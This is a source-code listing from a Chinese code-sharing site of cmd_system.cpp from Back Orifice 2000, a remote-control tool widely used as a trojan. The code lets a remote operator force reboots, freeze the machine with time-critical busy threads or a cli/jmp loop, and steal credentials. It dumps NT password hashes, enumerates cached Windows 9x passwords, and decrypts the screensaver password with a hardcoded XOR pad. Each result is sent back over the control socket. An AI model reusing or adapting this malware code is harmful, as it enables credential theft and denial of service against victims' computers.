开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
cmd_system.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:10k
源码类别:

远程控制编程

开发平台:

WINDOWS

cmd_system.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. #include<windows.h>
  21. #include<osversion.h>
  22. #include<functions.h>
  23. #include<auth.h>
  24. #include<iohandler.h>
  25. #include<encryption.h>
  26. #include<commandloop.h>
  27. #include<bocomreg.h>
  28. #include<dumppw.h>
  29. #include<cmdcmd_system.h>
  31. int CmdProc_SysReboot(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  32. {
  33. BOOL bRet;
  35. bRet=ExitWindowsEx(EWX_FORCE| EWX_REBOOT, 0);
  36. if(bRet==0) IssueAuthCommandReply(cas_from, comid, 0, "Reboot attempt failed.n");
  37. else IssueAuthCommandReply(cas_from, comid, 0, "Rebooting now.n");
  39. return 0;
  40. }
  42. DWORD WINAPI LockThread(LPVOID param)
  43. {
  44. while(1);
  45. return 0;
  46. }
  48. int CmdProc_SysLockup(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  49. {
  50. IssueAuthCommandReply(cas_from,comid,0,"Locking up machinen[Don't expect much to work after this!]n");
  51. Sleep(2000);
  53. if(g_bIsWinNT) {
  54. SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
  55. while(1) {
  56. DWORD dwTid;
  57. HANDLE hThread=CreateThread(NULL,0,LockThread,NULL,0,&dwTid);
  58. SetThreadPriority(hThread,THREAD_PRIORITY_TIME_CRITICAL);
  59. }
  61. } else {
  62. lockpoint:
  63. __asm {
  64. cli
  65. jmp lockpoint
  66. }
  67. }
  69. return 0;
  70. }
  72. #pragma pack(push,1)
  73. typedef struct {
  74. char *pBuffer;
  75. int nBufLen;
  76. int nBufPos;
  77. } PASSCACHECALLBACK_DATA;
  78. #pragma pack(pop)
  81. BOOL PASCAL PassCacheCallback(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData)
  82. {
  83. char buff[1024];
  84. char buff2[1024];
  85. int nCount;
  87. PASSCACHECALLBACK_DATA *dat;
  88. dat = (PASSCACHECALLBACK_DATA *)dwRefData;
  90. nCount=pce->cbResource;
  91. if(nCount>1023) nCount=1023;
  92. memmove(buff, pce->abResource, nCount);
  93. buff[nCount] = 0;
  94. CharToOem(buff, buff2);
  95. if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
  96. lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
  97. dat->nBufPos+=lstrlen(buff2)+1;
  99. nCount=pce->cbPassword;
  100. if(nCount>1023) nCount=1023;
  101. memmove(buff, pce->abResource+pce->cbResource, nCount);
  102. buff[nCount] = 0;
  103. CharToOem(buff, buff2);
  104. if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
  105. lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
  106. dat->nBufPos+=lstrlen(buff2)+1;
  108. return TRUE;
  109. }
  114. int CmdProc_SysListPasswords(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  115. {
  116. char svBuffer[512];
  117. DWORD dwBufSize;
  118. char svReply[512];
  120. if (g_bIsWinNT) {
  122. // PWDump style password dumping
  123. DumpPasswordHashes(cas_from,comid);
  125. } else {
  127. // Return passwords from password cache
  129. IssueAuthCommandReply(cas_from,comid,1,"Passwords cached by system:n");
  131. PASSCACHECALLBACK_DATA dat;
  132. dat.pBuffer=(char *)malloc(65536);
  133. dat.nBufLen=65536;
  134. dat.nBufPos=0;
  136. pWNetEnumCachedPasswords(NULL, 0, 0xff, PassCacheCallback, (DWORD) &dat);
  138. IssueAuthCommandReply(cas_from,comid,1,"Cached Passwords:n");
  140. char *svStr;
  141. svStr=dat.pBuffer;
  143. while(*svStr!='') {
  144. char *svRsc=svStr;
  145. svStr+=lstrlen(svStr)+1;
  146. char *svPwd=svStr;
  147. svStr+=lstrlen(svStr)+1;
  149. char svBuff[1024];
  150. wsprintf(svBuff, "Resource: '%.256s'  Password: '%.256s'n", svRsc, svPwd);
  151. IssueAuthCommandReply(cas_from,comid,1,svBuff);
  152. }
  154. free(dat.pBuffer);
  156. IssueAuthCommandReply(cas_from,comid,1,"End of cached passwords.n");
  158. // Return screen saver password
  160. char *regpws[5] = { ".Default", "Control Panel", "desktop", "" };
  162. HKEY key=HKEY_USERS,key2;
  163. int l;
  164. DWORD indx=0;
  165. while(regpws[indx][0]) {
  166. l=RegOpenKeyEx(key, regpws[indx], 0, KEY_READ, &key2) ;
  167. if(key!=HKEY_USERS) RegCloseKey(key);
  169. if(l!=ERROR_SUCCESS) {
  170. lstrcpy(svReply,"There is no screensaver password.n");
  171. goto exitssavepw;
  172. }
  174. key = key2;
  175. indx++;
  176. }
  178. dwBufSize=512;
  179. if(RegQueryValueEx(key, "ScreenSave_Data", NULL, NULL, (BYTE *)svBuffer, &dwBufSize)!=ERROR_SUCCESS) {
  180. lstrcpy(svReply, "Unable to read value 'ScreenSave_Data'.n");
  181. } else {
  182. // decode hex chars
  183. for (indx = 0; indx < dwBufSize/2; indx++) {
  184. char c1,c2;
  186. c1=svBuffer[indx*2];
  187. if(c1>='A' && c1<='F') c1=(c1-'A')+0xA;
  188. else if(c1>='a' && c1<='f') c1=(c1-'a')+0xA;
  189. else if(c1>='0' && c1<='9') c1=c1-'0';
  191. c2=svBuffer[indx*2+1];
  192. if(c2>='A' && c2<='F') c2=(c2-'A')+0xA;
  193. else if(c2>='a' && c2<='f') c2=(c2-'a')+0xA;
  194. else if(c2>='0' && c2<='9') c2=c2-'0';
  196. svBuffer[indx] = (c1<<4) | c2;
  197. }
  199. // xor with pad
  200. unsigned char xorpattern[60] = {0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1, 0x1B, 
  201.                             0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95, 0x97, 0x5F,
  202. 0x78, 0xd9, 0xda, 0x6c, 0x59, 0xd7, 0x6B, 0x35,
  203. 0xC5, 0x77, 0x85, 0x18, 0x2A, 0x0E, 0x52, 0xFF,
  204. 0x00, 0xE3, 0x1B, 0x71, 0x8D, 0x34, 0x63, 0xEB,
  205. 0x91, 0xC3, 0x24, 0x0F, 0xB7, 0xC2, 0xF8, 0xE3,
  206. 0xB6, 0x54, 0x4C, 0x35, 0x54, 0xE7, 0xC9, 0x49,
  207. 0x28, 0xA3, 0x85, 0x11};
  209. DWORD len;
  210. len=dwBufSize/2;
  211. if(len>60) len=60;
  212. for (indx = 0; indx < len; indx++) {
  213. svBuffer[indx] ^= xorpattern[indx];
  214. }
  215. svBuffer[len] = '';
  217. wsprintf(svReply, "ScreenSaver password: '%s'n", svBuffer);
  218. }
  220. RegCloseKey(key);
  222. exitssavepw:
  224. IssueAuthCommandReply(cas_from, comid,0,svReply);
  226. }
  228. return 0;
  229. }
  231. int CmdProc_SysViewConsole(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  232. {
  233. return -1;
  234. }
  236. int CmdProc_SysInfo(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  237. {
  238. char svBuffer[512];
  239. DWORD dwBufSize;
  240. char svReply[512];
  242. // Send back computer name
  244. dwBufSize = MAX_COMPUTERNAME_LENGTH+1;
  245. if(GetComputerName(svBuffer, &dwBufSize)==FALSE) {
  246. IssueAuthCommandReply(cas_from,comid,1,"Could not retrieve machine name.n");
  247. } else {
  248. wsprintf(svReply, "System info for machine '%.400s'n", svBuffer);
  249. IssueAuthCommandReply(cas_from,comid,1,svReply);
  250. }
  252. // Send back currently logged in user name
  254. dwBufSize = 512;
  255. if(GetUserName(svBuffer, &dwBufSize)==FALSE) {
  256. IssueAuthCommandReply(cas_from,comid,1,"Could not retrieve user name.n");
  257. } else {
  258. wsprintf(svReply, "Current user: '%.400s'n", svBuffer);
  259. IssueAuthCommandReply(cas_from,comid,1,svReply);
  260. }
  262. // Send back processor info
  264. SYSTEM_INFO sysInfo;
  266. lstrcpy(svReply, "Processor: ");
  268. GetSystemInfo(&sysInfo);
  269. switch (sysInfo.dwProcessorType) {
  270. case PROCESSOR_INTEL_386:
  271. lstrcat(svReply, "I386n");
  272. break;
  273. case PROCESSOR_INTEL_486:
  274. lstrcat(svReply, "I486n");
  275. break;
  276. case PROCESSOR_INTEL_PENTIUM:
  277. lstrcat(svReply, "I586n");
  278. break;
  279. case PROCESSOR_MIPS_R4000:
  280. lstrcat(svReply, "MIPSR4000n");
  281. break;
  282. default:
  283. lstrcat(svReply, "UNKNOWNn");
  284. break;
  285. }
  287. IssueAuthCommandReply(cas_from,comid,1,svReply);
  289. // Send back OS version info
  291. OSVERSIONINFO osvi;
  293. osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  294. if (GetVersionEx(&osvi) == FALSE) {
  295. lstrcpy(svReply, "Could not get version info.n");
  296. } else {
  297. switch(osvi.dwPlatformId) {
  298. case VER_PLATFORM_WIN32s:       
  299. lstrcpy( svBuffer, "Win32s on Windows 3.1");
  300. break;
  301. case VER_PLATFORM_WIN32_WINDOWS:
  302. lstrcpy( svBuffer, "Win32 on Windows 95");
  303. break;
  304. case VER_PLATFORM_WIN32_NT:
  305. lstrcpy( svBuffer, "Windows NT");
  306. break;
  307. default:
  308. lstrcpy( svBuffer, "Windows?");
  309. break;
  310. }
  311. wsprintf( svReply, "%s v%d.%d build %dn", svBuffer, (int)osvi.dwMajorVersion, (int)osvi.dwMinorVersion, (int)LOWORD(osvi.dwBuildNumber));
  312. if(lstrlen(osvi.szCSDVersion)) {
  313. lstrcat(svReply, " - ");
  314. lstrcat(svReply, osvi.szCSDVersion);
  315. lstrcat(svReply, "n");
  316. }
  317. }
  318. IssueAuthCommandReply(cas_from,comid,1,svReply);
  320. // Send back global memory usage
  321. MEMORYSTATUS memstat;
  322. DWORD dw,dw2,dw3,dw4;
  323. char c;
  324. int x;
  326. memstat.dwLength = sizeof(memstat);
  328. GlobalMemoryStatus(&memstat);
  329. wsprintf(svReply, "Memory: %dM in use: %d%%  Page file: %dM free: %dMn", memstat.dwTotalPhys/1024/1024, memstat.dwMemoryLoad, memstat.dwTotalPageFile/1024/1024, memstat.dwAvailPageFile/1024/1024 );
  330. IssueAuthCommandReply(cas_from,comid,1,svReply);
  332. for (c = 'C'; c <= 'Z'; c++) {
  333. wsprintf(svReply, "%c:\", c);
  334. x = GetDriveType(svReply);
  335. lstrcat( svReply, " - ");
  336. switch (x) {
  337. case 0:
  338. lstrcat(svReply, "Unable to determine.n");
  339. break;
  340. case 1:
  341. svReply[0]='';
  342. break;
  343. case DRIVE_REMOVABLE:
  344. lstrcat(svReply, "Removablen");
  345. break;
  346. case DRIVE_FIXED:
  347. lstrcat(svReply, "Fixed");
  348. wsprintf(svBuffer, "%c:\", c);
  349. if (GetDiskFreeSpace(svBuffer, &dw, &dw2, &dw3, &dw4)) {
  350. wsprintf(svBuffer, " Sec/Clust: %u Byts/Sec: %u,  Bytes free: %u/%un", (unsigned int)dw, (unsigned int)dw2, (unsigned int)(dw3*dw2*dw), (unsigned int)(dw4*dw2*dw));
  351. lstrcat(svReply, svBuffer);
  352. } else lstrcat(svReply,"n");
  353. break;
  354. case DRIVE_REMOTE:
  355. lstrcat(svReply, "Remoten");
  356. break;
  357. case DRIVE_CDROM:
  358. lstrcat(svReply, "CD-ROMn");
  359. break;
  360. case DRIVE_RAMDISK:
  361. lstrcat(svReply, "Ramdiskn");
  362. break;
  363. default:
  364. lstrcat(svReply, "Unknown type!n");
  365. break;
  366. }
  367. if(lstrlen(svReply))
  368. IssueAuthCommandReply(cas_from,comid,1,svReply);
  369. }
  371. IssueAuthCommandReply(cas_from,comid,0,"End of system infon");
  373. return 0;
  374. }